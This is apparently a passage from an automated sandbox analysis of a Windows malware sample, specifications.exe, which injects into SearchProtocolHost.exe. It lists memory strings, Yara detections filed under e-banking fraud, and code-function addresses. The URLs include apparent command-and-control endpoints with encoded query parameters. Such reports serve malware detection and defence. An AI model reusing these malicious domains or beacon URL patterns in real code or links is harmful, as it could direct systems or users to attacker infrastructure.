                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.000000000495C000.00000004.10000000.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.000000000424C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://conseilnsaftogo.org/lqxd/?Tr=kdnPUNSPd0&JZOtU=wYwrhtOuglxnIn2/Olpi5JeqaOWyslXDKK1NgpC20GbgYED
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/js/min.js?v2.3
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/28903/search.png)
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/28905/arrrow.png)
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/29590/bg1.png)
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Cortisalincontrol.net
                      Source: specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: specifications.exe, 00000000.00000002.1744315921.0000000008770000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlm
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.00000000039A8000.00000004.10000000.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003298000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.canadavinreport.site/4d2l/?JZOtU=ZGBp9LUVeZbORokkig5UphI/K
                      Source: specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: neghZqrDWkxUmu.exe, 00000008.00000002.4147180609.0000000005081000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.conseilnsaftogo.org
                      Source: neghZqrDWkxUmu.exe, 00000008.00000002.4147180609.0000000005081000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.conseilnsaftogo.org/lqxd/
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.cortisalincontrol.net/Ball_Bearings.cfm?fp=0RLhBi627cnyXpqt50cEzereqKJw1RabkozzSbMh7eg6YX
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.cortisalincontrol.net/Control.cfm?fp=0RLhBi627cnyXpqt50cEzereqKJw1RabkozzSbMh7eg6YXzb8Zql
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.cortisalincontrol.net/High_Fiber_Foods.cfm?fp=0RLhBi627cnyXpqt50cEzereqKJw1RabkozzSbMh7eg
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.cortisalincontrol.net/Nutritious_Snacks_Recipes.cfm?fp=0RLhBi627cnyXpqt50cEzereqKJw1Rabko
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.cortisalincontrol.net/Salt_Free_Diet.cfm?fp=0RLhBi627cnyXpqt50cEzereqKJw1RabkozzSbMh7eg6Y
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.cortisalincontrol.net/__media__/design/underconstructionnotice.php?d=cortisalincontrol.ne
                      E-Banking Fraud

                      Source: Yara match, File source: 2.2.specifications.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 2.2.specifications.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 00000007.00000002.4145588034.0000000000890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000002.00000002.2048253746.00000000034F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000007.00000002.4145624190.00000000008E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000002.00000002.2040380328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000002.00000002.2041857400.00000000013E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010814602_2_01081460
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0114F7B02_2_0114F7B0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010D56302_2_010D5630
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011416CC2_2_011416CC
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_011259102_2_01125910
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010999502_2_01099950
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AB9502_2_010AB950
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010FD8002_2_010FD800
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010938E02_2_010938E0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0114FB762_2_0114FB76
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AFB802_2_010AFB80
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01105BF02_2_01105BF0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010CDBF92_2_010CDBF9
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01147A462_2_01147A46
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0114FA492_2_0114FA49
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01103A6C2_2_01103A6C
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010D5AA02_2_010D5AA0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01131AA32_2_01131AA3
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0112DAAC2_2_0112DAAC
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0113DAC62_2_0113DAC6
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01093D402_2_01093D40
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01141D5A2_2_01141D5A
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01147D732_2_01147D73
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_010AFDC02_2_010AFDC0
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01109C322_2_01109C32
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0114FCF22_2_0114FCF2
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0114FF092_2_0114FF09
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01091F922_2_01091F92
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_0114FFB12_2_0114FFB1
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01053FD52_2_01053FD5
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01053FD22_2_01053FD2
                      Source: C:\Users\user\Desktop\specifications.exeCode function: 2_2_01099EB02_2_01099EB0
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeCode function: 6_2_032F9A8E6_2_032F9A8E
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeCode function: 6_2_032D902E6_2_032D902E
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeCode function: 6_2_032D90226_2_032D9022
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeCode function: 6_2_032D90F66_2_032D90F6
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeCode function: 6_2_032E164E6_2_032E164E
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeCode function: 6_2_032DAEDE6_2_032DAEDE
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeCode function: 6_2_032D8EDE6_2_032D8EDE
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeCode function: 6_2_032D8ED46_2_032D8ED4
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exeCode function: 6_2_032DACBE6_2_032DACBE
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BC20007_2_00BC2000
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BF01AA7_2_00BF01AA
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BE41A27_2_00BE41A2
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BE81CC7_2_00BE81CC
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BCA1187_2_00BCA118
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B201007_2_00B20100
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BB81587_2_00BB8158
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BB02C07_2_00BB02C0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BD02747_2_00BD0274
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B3E3F07_2_00B3E3F0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BF03E67_2_00BF03E6
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BEA3527_2_00BEA352
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BDE4F67_2_00BDE4F6
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BD44207_2_00BD4420
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BE24467_2_00BE2446
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BF05917_2_00BF0591
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B305357_2_00B30535
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B4C6E07_2_00B4C6E0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B2C7C07_2_00B2C7C0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B307707_2_00B30770
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B547507_2_00B54750
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B168B87_2_00B168B8
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B5E8F07_2_00B5E8F0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B3A8407_2_00B3A840
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B328407_2_00B32840
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B329A07_2_00B329A0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BFA9A67_2_00BFA9A6
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B469627_2_00B46962
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B2EA807_2_00B2EA80
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BE6BD77_2_00BE6BD7
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BEAB407_2_00BEAB40
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BD0CB57_2_00BD0CB5
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B20CF27_2_00B20CF2
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B30C007_2_00B30C00
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B48DBF7_2_00B48DBF
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B2ADE07_2_00B2ADE0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BCCD1F7_2_00BCCD1F
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B3AD007_2_00B3AD00
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B42E907_2_00B42E90
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BECE937_2_00BECE93
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BEEEDB7_2_00BEEEDB
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BEEE267_2_00BEEE26
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B30E597_2_00B30E59
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BAEFA07_2_00BAEFA0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B22FC87_2_00B22FC8
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B50F307_2_00B50F30
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BD2F307_2_00BD2F30
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B72F287_2_00B72F28
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BA4F407_2_00BA4F40
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BE70E97_2_00BE70E9
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BEF0E07_2_00BEF0E0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BDF0CC7_2_00BDF0CC
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B370C07_2_00B370C0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B3B1B07_2_00B3B1B0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B1F1727_2_00B1F172
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BFB16B7_2_00BFB16B
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B6516C7_2_00B6516C
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B352A07_2_00B352A0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B4D2F07_2_00B4D2F0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BD12ED7_2_00BD12ED
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B4B2C07_2_00B4B2C0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B7739A7_2_00B7739A
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BE132D7_2_00BE132D
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B1D34C7_2_00B1D34C
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BEF43F7_2_00BEF43F
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B214607_2_00B21460
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BCD5B07_2_00BCD5B0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BF95C37_2_00BF95C3
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BE75717_2_00BE7571
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BE16CC7_2_00BE16CC
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B756307_2_00B75630
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BEF7B07_2_00BEF7B0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B338E07_2_00B338E0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B9D8007_2_00B9D800
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BC59107_2_00BC5910
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B399507_2_00B39950
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B4B9507_2_00B4B950
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BCDAAC7_2_00BCDAAC
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B75AA07_2_00B75AA0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BD1AA37_2_00BD1AA3
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BDDAC67_2_00BDDAC6
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BA3A6C7_2_00BA3A6C
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BEFA497_2_00BEFA49
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BE7A467_2_00BE7A46
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B4FB807_2_00B4FB80
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BA5BF07_2_00BA5BF0
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00B6DBF97_2_00B6DBF9
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BEFB767_2_00BEFB76
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 7_2_00BEFCF27_2_00BEFCF2
